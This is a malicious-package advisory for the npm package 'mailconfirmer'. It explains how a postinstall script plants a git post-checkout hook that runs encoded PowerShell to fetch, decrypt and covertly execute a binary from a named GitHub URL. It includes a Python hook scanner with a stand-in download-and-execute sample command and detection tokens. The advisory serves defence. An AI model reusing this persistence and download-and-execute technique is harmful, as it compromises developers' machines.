MAL-2026-5750

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mailconfirmer/MAL-2026-5750.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5750
Published
2026-06-13T21:10:40Z
Modified
2026-06-13T21:46:45.607951836Z
Summary
Malicious code in mailconfirmer (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fbadb3bfdda7f6b7d425f83f9d5007a59d92c19c75fee43181a471a5627fac7f)

The package advertises itself as an email confirmation/verification utility, but the shipped code contains no such functionality: index.js exports only a single getThemeColor function that returns a color string. The real behavior is in install-hook.js, which runs via the postinstall lifecycle script. It writes a .git/hooks/post-checkout hook into the installer's local repository whose contents are powershell -NoP -NonI -W Hidden -Enc <base64>.

The base64 blob decodes to UTF-16LE PowerShell that downloads https://github.com/Dimitrijenco/Stickynote/releases/download/v2/launcher.bin, XOR-decrypts the response with key 0x42, writes the result to %TEMP%\tmp.exe, executes it hidden via Start-Process -WindowStyle Hidden, sleeps, and deletes it. The dropper URL is hosted on an unrelated third-party GitHub account, and the repository name (Stickynote) has nothing to do with the package's stated purpose. Two layers of obfuscation (base64-encoded UTF-16LE PowerShell plus an XOR-encrypted payload) hide both the destination and the executed bytes.

The persistence mechanism, a git post-checkout hook, re-triggers the download-and-execute path on every future git checkout in any repository where the package was installed, and it survives uninstalling the package.
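A defender-side triage helper, added here as an example (not code from the OSV record, the package or its reporter): it walks a checkout's .git/hooks, flags hooks that invoke powershell with an -Enc argument, decodes the base64 as UTF-16LE the way the advisory describes, and reports URLs and download/hidden-execute fragments found in the decoded script. The sample hook, its script and the example.invalid URL are constructed stand-ins, not the real payload.

```python
import base64
import re
from pathlib import Path

# powershell/pwsh invoked with an -Enc / -EncodedCommand base64 argument (the hook shape above).
ENCODED_PS_RE = re.compile(
    r"(?:powershell|pwsh)(?:\.exe)?[^\n]*?-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+")
# Cmdlets and fragments matching the download / hidden-execute behaviour the advisory describes.
SUSPICIOUS_TOKENS = ("DownloadFile", "DownloadData", "Invoke-WebRequest", "Start-Process",
                     "-WindowStyle Hidden", "$env:TEMP", "-bxor")

def decode_encoded_command(blob):
    """-Enc carries base64 of UTF-16LE text; returns None when the blob does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_hook(text):
    """One finding per encoded PowerShell invocation found in a hook body."""
    findings = []
    for m in ENCODED_PS_RE.finditer(text):
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:  # an undecodable blob in a git hook is still worth reporting
            findings.append({"decoded": None, "urls": [], "tokens": ["undecodable -Enc blob"]})
            continue
        findings.append({"decoded": decoded, "urls": URL_RE.findall(decoded),
                         "tokens": [t for t in SUSPICIOUS_TOKENS if t.lower() in decoded.lower()]})
    return findings

def scan_repo_hooks(repo):
    """Walk <repo>/.git/hooks and return {hook name: findings} for hooks carrying encoded PowerShell."""
    hooks_dir = Path(repo) / ".git" / "hooks"
    report = {}
    for hook in hooks_dir.iterdir() if hooks_dir.is_dir() else []:
        if hook.is_file() and hook.suffix != ".sample":
            findings = analyse_hook(hook.read_text(errors="replace"))
            if findings:
                report[hook.name] = findings
    return report

# Constructed sample, not the real hook: same shape as described above, placeholder URL.
_SAMPLE_SCRIPT = ("Invoke-WebRequest 'https://example.invalid/launcher.bin' -OutFile $env:TEMP\\tmp.exe; "
                  "Start-Process -WindowStyle Hidden $env:TEMP\\tmp.exe")
SAMPLE_HOOK = ("#!/bin/sh\npowershell -NoP -NonI -W Hidden -Enc "
               + base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii") + "\n")
```

scan_repo_hooks() takes the path of a working copy and is the function to run across every checkout on a machine where the package was installed, since the hook outlives the package.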

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006411",
            "versions": [
                "3.2.36"
            ],
            "sha256": "ab3cad84eca57c86cc11c7bdd3e072acac609d4f034da4f5c72b38461167ee78",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:48Z",
            "import_time": "2026-06-13T21:32:33.762548026Z"
        },
        {
            "id": "IN-MAL-2026-006407",
            "versions": [
                "3.3.11"
            ],
            "sha256": "de9ef8c8cab85ca4e823488834021667649cf2de0712bf45f5e8018160b4263f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:42Z",
            "import_time": "2026-06-13T21:32:33.619539023Z"
        },
        {
            "id": "IN-MAL-2026-006405",
            "versions": [
                "3.3.12"
            ],
            "sha256": "e52f457c75436cfdff28cbf77522b7fd1e8c4470cee05d2058b6dbb3ad3c9adb",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:40Z",
            "import_time": "2026-06-13T21:32:33.548397829Z"
        },
        {
            "id": "IN-MAL-2026-006410",
            "versions": [
                "3.2.34"
            ],
            "sha256": "eede6f1c9fae38c807231ada52a36f68c02665da89e136a5067c7b2fbd2e278d",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:44Z",
            "import_time": "2026-06-13T21:32:33.730505728Z"
        },
        {
            "id": "IN-MAL-2026-006406",
            "import_time": "2026-06-13T21:32:33.586759588Z",
            "sha256": "fa2d157af30e6767ee02f791a0371ca0be7f3f9d4e8b3ebb949ef7f7c0b3a1aa",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:41Z",
            "versions": [
                "3.2.38"
            ]
        },
        {
            "id": "IN-MAL-2026-006408",
            "versions": [
                "3.2.35"
            ],
            "sha256": "fbadb3bfdda7f6b7d425f83f9d5007a59d92c19c75fee43181a471a5627fac7f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:43Z",
            "import_time": "2026-06-13T21:32:33.650159998Z"
        },
        {
            "id": "IN-MAL-2026-006409",
            "versions": [
                "3.2.35"
            ],
            "sha256": "b407412bea355d5ff296e45c1b9fc4afdcd20624f98a8bf3f32cb37ef64b2f41",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:43Z",
            "import_time": "2026-06-13T21:32:33.693842334Z"
        },
        {
            "id": "IN-MAL-2026-006404",
            "import_time": "2026-06-13T21:32:33.500761473Z",
            "sha256": "d66737fba6d2c0034f50352ebfa965356b9f75500f2adc19833be3628b7b9430",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T21:10:40Z",
            "versions": [
                "3.3.13"
            ]
        }
    ]
}

Affected packages

Package: npm / mailconfirmer
Affected ranges: (none listed)
Affected versions: 3.2.34, 3.2.35, 3.2.36, 3.2.38, 3.3.11, 3.3.12, 3.3.13 (all 3.*)

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mailconfirmer/MAL-2026-5750.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "install-hook.js",
            "sha256": "eff924265960cb90e5cb7da874a3ebc2312f2b9acf0d628fd405f2e728efa01c",
            "tlsh": "8761e03d8a75fdd043aeb2d05d3a3f0b10985f13a7b9656ce5d205e82824a85ef3a19c"
        },
        {
            "path": "package.json",
            "sha256": "9047c1a0243416cff52f590db440dfaad432c5d85dcb54bb790164dd47b33daa",
            "tlsh": "f9e02053cf48159339f64bf75c1b51467eb20b6f14105d06397350544750b726f2bf19"
        }
    ],
    "package_integrity": [
        {
            "filename": "mailconfirmer-3.2.36.tgz",
            "hashes": {
                "sha512_sri": "sha512-wWm4gSdpiiRlUkHTFAKPliQdEF/wrLYCqEYy/EfQsYBcW+Anck2DTxlHCyk5sL8lfarsXJlnbfpIuoSCMTnBmA==",
                "sha1": "c9bcac06168b4181c17df5768652489080c50da1"
            }
        }
    ],
    "ips": [
        "151.101.192.223",
        "140.82.112.3",
        "185.199.108.133",
        "185.199.109.133",
        "151.101.64.223",
        "151.101.0.223"
    ]
}